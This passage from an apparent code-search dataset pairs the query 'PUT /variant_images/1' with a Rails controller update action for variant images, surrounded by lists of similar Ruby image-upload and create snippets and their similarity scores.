"def upload_new_image_file(detection_flags, image = {})\n @client.post \"/service_json_ssl.svc/UploadNewImage_File\", {detection_flags:detection_flags,imagefile_data:image[:data],original_filename:image[:original_filename]}\n end",
"def create\n\n post = Post.new(post_params)\n post.location = Location.create(name: params[:post][:location][:name], lat: params[:post][:location][:lat], long: params[:post][:location][:long])\n if post.save\n params[:post][:images].each do |i|\n img = Image.find(i[:id])\n img.update(active: 1, post_id: post.id)\n end\n\n render json: {\n status: \"success\",\n data: post.as_json(\n include: [\n {\n user:\n {\n only: [:id, :name, :avatar]\n }\n },\n :location,\n {\n images: {\n only: [:id, :src]\n }\n },\n :rates\n ])}, status: :ok\n\n else\n render json: post.errors, status: 404\n end\n end",
"def create\n params[:exercise_medium_image][:token] = params[:exercise_medium_id]\n @exercise_image = case @exercise.blank?\n when true\n ExerciseMediumImage.new(params[:exercise_medium_image])\n when false\n @exercise.exercise_images.new(params[:exercise_medium_image])\n end\n \n # Won't validate so we avoid carrierwave error checking\n if @exercise_image.save(:validate=>false)\n file_name = ActiveRecord::Base.sanitize(params[:exercise_medium_image][:image])\n\n # Manually update exercise so we avoid carrierwave\n ActiveRecord::Base.connection.execute(\"update exercise_images set image=\" + file_name+ \" where id=\" + @exercise_image.id.to_s)\n @exercise_image.reload\n # Maybe reprocess the image to get thumbnails?? Naaah\n\n render json: @exercise_image, status: :created\n else\n render json: @exercise_image.errors.full_messages, status: :unprocessable_entity\n end\n \n end",
"def create\n # @taxi_photo = TaxiPhoto.new(taxi_photo_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @tour_photo = TourPhoto.new(image:image)\n @tour_photo.save\n }\n \n end\n redirect_to \"/tour_photos/gallery\"\n end",
"def create\n @car = Car.new(car_params)\n\n respond_to do |format|\n if @car.save\n params[:photos]['image'].each do |p|\n @photo = @car.photos.create!(:image => p, :car_id => @car.id)\n end\n format.html { redirect_to @car, notice: 'Car was successfully added.' }\n format.json { render :show, status: :created, location: @car }\n else\n format.html { render :new }\n format.json { render json: @car.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n # original code\n\n # @image_set = ImageSet.create(image_set_params)\n\n # render json: @image_set\n\n# code for imageMagick\n @image_set = current_user.image_sets.guild(image_set_params)\n authorize @image_set\n if @image_set.save\n # to handle multiple image upload on create\n if params[:images]\n params[:images].each {|image|\n @image_set.images.create(image: image)\n }\n end\n flash[:notice] = \"Your image set has been created.\"\n redirect_to @image_set\n else\n flash[:alert] = \"Something went wrong.\"\n render 'new'\n end\n\n end",
"def create\n @sku = Sku.new(params[:sku])\n @photo = Photo.new\n respond_to do |format|\n if @sku.save\n format.html { redirect_to @sku, notice: 'Sku was successfully created.' }\n format.json { render json: @sku, status: :created, location: @sku }\n else\n format.html { render action: \"new\" }\n format.json { render json: @sku.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @upload_preview = UploadPreview.new(params[:upload_preview])\n \n if @upload_preview.save\n render :json => {:img_path => @upload_preview.img.url.to_s,:id=>@upload_preview.id, \n :name => @upload_preview.img.instance.attributes[\"img_file_name\"]}, :content_type => 'text/html' \n else\n render :json => {:result => 'error'}, :content_type => 'text/html'\n end\n end",
"def upload_image\n image_file = ImageFile.new(params)\n\n delete_image() unless @collection.image.nil?\n\n @image = @collection.build_image({ extension: image_file.extension })\n\n unless @image.save\n render json: @image.errors, status: :unprocessable_entity; return\n end\n\n image_file.name = @image._id\n image_processor = CollectionImageProcessor.new(collection_id, image_file)\n\n if image_processor.save_image\n render json: @collection, status: :ok#, location: @collection\n else\n render json: image_processor.errors, status: :unprocessable_entity\n end\n end",
"def create\n @image_tag = ImageTag.new(process_params)\n\n respond_to do |format|\n if @image_tag.save\n format.html { redirect_to @image_tag, notice: 'Image tag was successfully created.' }\n format.json { render :show, status: :created, location: @image_tag }\n else\n format.html { render :new }\n format.json { render json: @image_tag.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n\n if @post.save && params[:images]\n params[:images].each { |image|\n @post.images.create(image: image)\n }\n end\n\n redirect_to @post\n end",
"def create\n @vehicle_type = VehicleType.new(vehicle_type_params)\n\n respond_to do |format|\n if @vehicle_type.save\n images\n\n format.html { redirect_to @vehicle_type, notice: 'Vehicle type was successfully created.' }\n format.json { render json: @vehicle_type, status: :created }\n else\n format.html { render action: 'new' }\n format.json { render json: @vehicle_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @gallery = Gallery.new(gallery_params)\n\n respond_to do |format|\n if @gallery.save\n if params[:images]\n params[:images].each { |image|\n pic = @gallery.pics.create(image: image)\n data = Cloudinary::Uploader.upload(image,@auth)\n pic.public_id = data['secure_url']\n pic.image_file_size = data['bytes']\n pic.save\n }\n end\n\n format.html { redirect_to @gallery, notice: 'Gallery was successfully created.' }\n format.json { render json: @gallery, status: :created, location: @gallery }\n else\n format.html { render action: \"new\" }\n format.json { render json: @gallery.errors, status: :unprocessable_entity }\n end\n end\n end",
"def variant_params\n params.require(:variant).permit(:sku, :product_id, :position, :price, :variant_price, option_value_ids: [], assets_attributes: [:id, :image, :_destroy])\n end",
"def create\n @truck = Truck.new(truck_params)\n\n if @truck.images.count>0\n @truck.images.attach(params[:truck][:images])\n end\n\n respond_to do |format|\n if @truck.save\n format.html { redirect_to @truck, notice: 'Truck was successfully created.' }\n format.json { render :show, status: :created, location: @truck }\n else\n format.html { render :new }\n format.json { render json: @truck.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # @tag = Tag.new(tag_params)\n @tag = Tag.new(:name => params[:name], :image_id => params[:image_id])\n @image = @tag.image\n\n respond_to do |format|\n if @tag.save\n format.js { render :layout => false }\n else\n format.js { render :layout => false }\n end\n end\n end",
"def create\n request_image = params[:image]\n url_hash = SecureRandom.urlsafe_base64(6)\n name = url_hash + \"-\" + request_image.original_filename.downcase\n\n File.open(\"#{Rails.root}/public/theta/#{name}\", 'wb') do |f|\n f.write(request_image.read)\n end\n\n theta = Theta.create!(url_hash: url_hash, image_url: name)\n render json: {url: \"http://www.rakugaki.tk/h/#{theta.url_hash}\"}, status: 201\n end",
"def create\n @album = Album.new(params[:album])\n \n respond_to do |format|\n images = [params[:images]].flatten\n @album.images << Image.find(images) unless images[0].nil?\n \n if @album.save\n format.html { redirect_to(albums_path, :notice => 'Album was successfully created.') }\n format.xml { render :xml => albums_path, :status => :created, :location => @album }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @album.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n #debugger\n blog = blog_params[:name]\n @user = User.find(session[:user_id])\n\n params[:image][:attached_assets_attrs].each do |item|\n ImgGroup.post item[:asset], @user, blog\n end\n\n respond_to do |format|\n format.html { render action: 'done' }\n format.json { render text: 'All posted.', status: :created, location: @image }\n end\n end",
"def create\n @family_image = FamilyImage.new(family_image_params)\n\n if @family_image.save\n render json: @family_image, status: :created, location: @family_image\n else\n render json: @family_image.errors, status: :unprocessable_entity\n end\n end",
"def destroy\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n @variant_image.destroy\n\n respond_to do |format|\n format.html { redirect_to @variant.product }\n format.json { head :ok }\n end\n end",
"def create\n @recipe_image_form = RecipeImageForm.new(recipe_image_params)\n\n respond_to do |format|\n if recipe_image = @recipe_image_form.save\n format.html { redirect_to @recipe_image_form.recipe, notice: 'Recipe image was successfully created.' }\n format.json { render :show, status: :created, location: recipe_image }\n else\n format.html { render :new }\n format.json { render json: @recipe_image_form.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_images\n\t\tif @current_user.present?\n\t\t\t@property = Property.find(params[:property_id])\n\t\t\tif @property.present?\n\t\t\t\t# if @property.images.present?\n\t\t\t\t# \t@property.images.destroy_all\n\t\t\t\t# end\n\t\t\t\tparams[:images].each { |image|\n\t i = @property.images.create(image: image)\n\t if i.save\n\t else\n\t \trender_json({\"status\" => \"Fail\", \"message\" => i.errors.full_messages.first}.to_json)\n\t \treturn\n\t end\n\t }\n\t @property.images.first.update_attributes(is_starred: true)\n\t render :file => 'api/v1/property/add_image'\n\t else\n\t \trender_json({\"status\" => \"Fail\", \"message\" => \"No property found.\"}.to_json)\n\t end\n\t\tend\n\tend",
"def create\n msg = \"\"\n if params[:client_images].present?\n params[:client_images].split(\",\").each do |image_ur|\n if @client.client_images.where(stage_id: params[:client_image][:stage_id]).count < 10\n params[:client_image][:file] = image_ur\n client_image = @client.client_images.new(client_image_params)\n client_image.save\n else\n msg = \"Client has only 10 client images per stage\"\n break\n end\n end\n else\n msg = \"Please choose the images\"\n end\n\n notice = msg.present? ? msg : \"Client images were successfully created.\"\n\n if params[:manage_image]\n respond_to do |format|\n format.html { redirect_to client_client_images_path(params[:client_id], stage_id: params[:client_image][:stage_id]), notice: notice }\n # format.json { render :show, status: :created, location: @client_image }\n end\n else\n respond_to do |format|\n format.html { redirect_to redirect_panel_path, notice: notice }\n # format.json { render :show, status: :created, location: @client_image }\n end\n end\n end",
"def create\n @listing = current_admin.listings.build(listing_params)\n\n respond_to do |format|\n if @listing.save\n\n if params[:pictures]\n #===== The magic is here ;)\n params[:pictures].each { |image|\n @listing.pictures.create(file: image)\n }\n end\n\n format.html { redirect_to admin_listings_url, notice: 'Listing was successfully created.' }\n format.json { render :show, status: :created, location: @listing }\n else\n format.html { render :new }\n format.json { render json: @listing.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_image\n image_url = @row[:image]\n return if image_url.blank?\n\n variant = Spree::Variant.find_by(is_master: true, product_id: @product.id)\n raise 'Product variant not found' unless variant\n\n image = Spree::Image.find_or_initialize_by viewable_id: variant.id\n return if image.id\n\n local_image = get_local_image image_url\n image.attachment = File.open(local_image, 'r')\n image.viewable_type = 'Spree::Variant'\n image.save\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: \"Image was successfully created.\" }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @picture = Picture.create!(picture_params)\n render json: @picture, status: :created\n end",
"def create\n @image_to_sample = ImageToSample.new(image_to_sample_params)\n\n respond_to do |format|\n if @image_to_sample.save\n format.html { redirect_to @image_to_sample, notice: 'Image to sample was successfully created.' }\n format.json { render action: 'show', status: :created, location: @image_to_sample }\n else\n format.html { render action: 'new' }\n format.json { render json: @image_to_sample.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n @image.user_token = @user_token\n\n respond_to do |format|\n params_hash = image_params\n if not params_hash[:aspect_ratio]\n @image.errors.add(:url, \"Must be a valid URL to an image\")\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n elsif @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @picture = Picture.new(picture_params)\n\n if @picture.save\n @picture.update(foodscape_id: params[:foodscape_id])\n render json: @picture, status: :created\n else\n render json: @picture.errors, status: :unprocessable_entity\n end\n end",
"def create\n @dog = Dog.new(dog_params)\n\n respond_to do |format|\n if @dog.save\n @dog.images.attach(params[:dog][:image]) if params[:dog][:image].present?\n\n format.html { redirect_to @dog, notice: 'Dog was successfully created.' }\n format.json { render :show, status: :created, location: @dog }\n else\n format.html { render :new }\n format.json { render json: @dog.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @sample_photo = SamplePhoto.new(sample_photo_params)\n\n\n if @sample_photo.save\n render json: @sample_photo, status: :created\n else\n render json: @sample_photo.errors, status: :unprocessable_entity\n end\n end",
"def add_images\n @parent = get_parent(params[:parent_id])\n\n #Images to Add\n if(!@parent.images.nil?)\n @parent.images.clear\n end\n if(!params[:Image_ids].nil?)\n for id in params[:Image_ids]\n @parent.images.push(Image.find(id))\n end\n end\n respond_to do |format|\n if @parent.save\n #Uses a session variable for reloading the current page assigned to the variable\n format.html { redirect_to session[:rq], notice: 'Image(s) successfully added.' }\n format.json { render json: @parent, status: :created, location: @parent }\n else\n format.html { render action: \"\" }\n format.json { render json: @parent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @taxi_image = TaxiImage.new(taxi_image_params)\n\n respond_to do |format|\n if @taxi_image.save\n format.html { redirect_to @taxi_image, notice: 'Taxi image was successfully created.' }\n format.json { render :show, status: :created, location: @taxi_image }\n else\n format.html { render :new }\n format.json { render json: @taxi_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n flash[:success] = 'Image was successfully created.'\n format.html { redirect_to new_admin_image_preview_url(image_id: @image.id) }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @rent.update(rent_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n \n format.html { redirect_to @rent, notice: 'Rent was successfully updated.' }\n format.json { render :show, status: :ok, location: @rent }\n else\n format.html { render :edit }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image_attrib = ImageAttrib.new(image_attrib_params)\n\n if @image_attrib.save\n render :show, status: :created, location: @image_attrib\n else\n render json: @image_attrib.errors, status: :unprocessable_entity\n end\n end",
"def variants\n VARIANTS.keys.map do |size|\n CreateImage.new(attributes.merge(size: size, disabled: size != 'large'))\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@experience_image = ExperienceImage.new(experience_image_params)\n logger.debug \"The params coming in are:#{params.inspect}\"\n @experience_image = ExperienceImage.new(experience_image_params)\n logger.debug \"The file created is: #{@experience_image.inspect}\"\n\n\n respond_to do |format|\n if @experience_image.save\n format.json{ render :json => @experience_image }\n else\n format.json { render json: @experience_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def create\n @slider_image = SliderImage.new(params[:slider_image])\n\n respond_to do |format|\n if @slider_image.save\n format.html { redirect_to @slider_image, notice: 'Slider image was successfully created.' }\n format.json { render json: @slider_image, status: :created, location: @slider_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @slider_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @product = Product.new(product_params)\n @product.images.attach(params[:product][:images]) if params[:product][:images]\n\n respond_to do |format|\n if @product.save\n format.html { redirect_to seller_product_path(current_seller.id, @product.id), notice: 'Product was successfully created.' }\n format.json { render :show, status: :created, location: @product }\n else\n format.html { render :new }\n format.json { render json: @product.errors, status: :unprocessable_entity }\n end\n end\n end",
"def set_viewable\n viewable_id = params[:image][:viewable_id]\n\n if viewable_id.is_a?(Hash)\n @product.errors.add(:attachment, 'Erro')\n option_values_array = viewable_id.map {|option_type, option_values| option_values.map(&:to_i) }\n option_values_combinations = option_values_array.shift\n option_values_array.each do |option_value|\n option_values_combinations = option_values_combinations.product(option_value)\n end\n option_values_combinations = option_values_combinations.map(&:flatten) if option_values_combinations.count > 1\n\n @product.variants.each do |variant|\n option_values_combinations.each do |ov_combination|\n variant_option_ids = variant.option_values.pluck(:id)\n\n if ([ov_combination].flatten - variant_option_ids).empty?\n create_image(variant, permitted_resource_params)\n end\n end\n end\n else\n viewable_id = params[:master_option] if params[:master_option]\n @image.viewable_type = 'Spree::Variant'\n @image.viewable_id = viewable_id\n end\n end",
"def create\n @product = Product.new(name: product_params[:name], description: product_params[:description], product_type: product_params[:product_type],\n dimensions: product_params[:dimensions], weight: product_params[:weight], material: product_params[:material], product_code: product_params[:product_code],\n is_new_release: product_params[:is_new_release], collection_id: product_params[:collection_id], sub_collection_id: product_params[:sub_collection_id])\n respond_to do |format|\n if product_params[:product_images_attributes]\n product_params[:product_images_attributes].each do |pia|\n @product_image = ProductImage.new(product_image: pia[:product_image], product_id: Product.last.id+1)\n if not @product_image.valid?\n format.html { render :new }\n format.json { render json: @product_image.errors, status: :unprocessable_entity }\n break\n end\n end\n end\n if @product.save\n # if product_params[:product_images_attributes]\n # product_params[:product_images_attributes].each do |pi|\n # @product.product_images.create(product_image: pi[:product_image])\n # end\n # end\n format.html { redirect_to @product, notice: 'Product was successfully created.' }\n format.json { render :show, status: :created, location: @product }\n else\n format.html { render :new }\n format.json { render json: @product.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @variant = @product.variants.new(params.require(:variant).permit!)\n @variant.price = params[:variant][:price]\n respond_to do |format|\n if @variant.save\n format.html { redirect_to admin_product_variants_url(@product), notice: 'Variant was successfully created.' }\n format.json { render action: 'show', status: :created, location: @variant }\n else\n format.html { render action: 'new' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render action: 'show', status: :created, location: @image }\n else\n format.html { render action: 'new' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @property_image = PropertyImage.new(params[:property_image])\n\n respond_to do |format|\n if @property_image.save\n format.html { redirect_to property_images_path, notice: 'Property image was successfully created.' }\n format.json { render json: @property_image, status: :created, location: @property_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @property_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @event = Event.new(event_params)\n\n tag_array = event_params2['tags'].split(',')\n tag_array.each do |x|\n @tag = Tag.create(desc: x)\n @event.tags << @tag\n end\n EventTag.create(event_id: @event.id, tag_id: @tag.id)\n\n respond_to do |format|\n if @event.save\n params[:event]['images'].each do |a|\n @event_photo = @event.event_photos.create!(:image => a, :event_id => @event.id)\n end\n format.html { redirect_to @event, notice: 'Event was successfully created.' }\n format.json { render :show, status: :created, location: @event }\n else\n format.html { render :new }\n format.json { render json: @event.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.65627486",
"0.65037525",
"0.6433147",
"0.64226496",
"0.6414937",
"0.6413051",
"0.63565314",
"0.6343757",
"0.6338299",
"0.6301123",
"0.6272123",
"0.62499154",
"0.6220626",
"0.617524",
"0.617524",
"0.61609745",
"0.6148033",
"0.612654",
"0.60613704",
"0.6023113",
"0.6020223",
"0.6009458",
"0.5978584",
"0.5964849",
"0.59534657",
"0.59323245",
"0.59259784",
"0.5909164",
"0.5909056",
"0.58957505",
"0.5894166",
"0.58881384",
"0.5864165",
"0.58436656",
"0.5843072",
"0.5841127",
"0.58382344",
"0.58250034",
"0.5817412",
"0.58104247",
"0.5800983",
"0.57990646",
"0.57954305",
"0.57934153",
"0.57908756",
"0.5785248",
"0.5777396",
"0.57694626",
"0.5767351",
"0.57613844",
"0.5760114",
"0.5756075",
"0.57540387",
"0.5752588",
"0.5749607",
"0.5745982",
"0.57451725",
"0.57432467",
"0.5735954",
"0.5734562",
"0.57338494",
"0.57330555",
"0.57311237",
"0.57278657",
"0.57076615",
"0.5702286",
"0.56971663",
"0.56900215",
"0.5685283",
"0.5683414",
"0.5682405",
"0.5682323",
"0.5677877",
"0.5677606",
"0.5674716",
"0.56687534",
"0.5662788",
"0.56627566",
"0.5660221",
"0.5658537",
"0.56575215",
"0.56575215",
"0.56575215",
"0.56575215",
"0.5657151",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5641843",
"0.5641843",
"0.56403583",
"0.563696",
"0.5636904",
"0.5631242",
"0.5628726",
"0.56242573",
"0.56238914",
"0.56232697"
] | 0.72633463 | 0 |
PUT /variant_images/1 PUT /variant_images/1.json | def update
@variant_image = VariantImage.find(params[:id])
respond_to do |format|
if @variant_image.update_attributes(params[:variant_image])
format.html { redirect_to @variant_image, notice: 'Variant image was successfully updated.' }
format.json { head :ok }
else
format.html { render action: "edit" }
format.json { render json: @variant_image.errors, status: :unprocessable_entity }
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n #we can allow updating an image name and description and unit, but not the image data. for that we need to create a new image\n update_params = image_params\n update_params.delete(\"image\")\n\n if @image.update(update_params)\n head :no_content\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n params[:image].delete :created_at\n params[:image].delete :updated_at\n params[:image].delete :id\n @image = Image.find(params[:id])\n if @image.update_attributes(params[:image])\n render json: @image\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n if (image!=nil)\n @apartment.pictures.create(image: image)\n \n end\n }\n end\n format.html { redirect_to @apartment, notice: 'La propiedad se actualizo correctamente.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @product_image.update_attributes(product_image_params)\n render json: @product_image, status: 200\n else\n render_error 400, @product_image.errors.full_messages\n end\n end",
"def update\n\n params = image_params\n params[\"tags\"] = params[\"tags\"].delete_suffix(',')\n\n respond_to do |format|\n if @image.update(params)\n format.html { redirect_to @image, notice: \"Image was successfully updated.\" }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @smartphone.update(smartphone_params)\n if params[:images]\n params[:images].each do |val|\n temp = @smartphone.pictures.find_by(image_file_name: val.original_filename)\n if temp\n temp.update_attributes(:image => val)\n else\n @smartphone.pictures.create(image: val)\n end\n end\n end\n format.html { redirect_to @smartphone, notice: 'Smartphone was successfully updated.' }\n format.json { render :show, status: :ok, location: @smartphone }\n else\n format.html { render :edit }\n format.json { render json: @smartphone.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n new_images = params[:images]||[]\n\n @intention = Intention.find_by_uuid(params[:id])\n @intention.image_urls = IntentionsHelper.strip_duplicate_images(new_images)\n @intention.save\n\n points = VISBD_INTENTION_IMAGE_POINTS*new_images.count\n track_event(current_action_item(Intention::COMPONENT_TYPE)||current_enrollment, Intention::VISUALIZED_EVENT, target:@intention, points:points)\n\n render nothing: true\n end",
"def update\n respond_to do |format|\n if @icesled.update(icesled_params)\n if params[:images]\n @icesled.gallery ||= Gallery.new\n params[:images].each do |image|\n @icesled.gallery.images.create(image: image)\n end\n unless @icesled.image_file_size\n @icesled.update(image: @icesled.gallery.images.first.image)\n end\n end\n format.html { redirect_to @icesled, notice: 'Icesled was successfully updated.' }\n format.json { render :show, status: :ok, location: @icesled }\n else\n format.html { render :edit }\n format.json { render json: @icesled.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n type = @image.url_type\n if @image.update_attributes!(params[:image])\n if request.xhr?\n render :text => [ @image.to_jq_upload(type, \"image\") ].to_json.to_s\n else\n redirect_to console_images_path\n end\n else \n if request.xhr?\n render :text => [ @image.to_jq_upload(type, \"image\").merge({ :error => \"custom_failure\" }) ].to_json.to_s\n else\n redirect_to edit_console_image_path(@image)\n end\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def update\n respond_to do |format|\n if @rent.update(rent_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n \n format.html { redirect_to @rent, notice: 'Rent was successfully updated.' }\n format.json { render :show, status: :ok, location: @rent }\n else\n format.html { render :edit }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = ServiceImage.find(params[:id])\n respond_to do |format|\n if @image.update(car_image_params)\n flash[:success] = \"Car Image was successfully updated.\"\n format.html { redirect_to admin_car_car_images_path(@image.car) }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image.update(image_params)\n redirect_to '/images'\n end",
"def update\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @apartment.photos.create!(:image => a, :apartment_id => @apartment.id)\n end\n end\n format.html { redirect_to @apartment, notice: 'Apartment was successfully updated.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
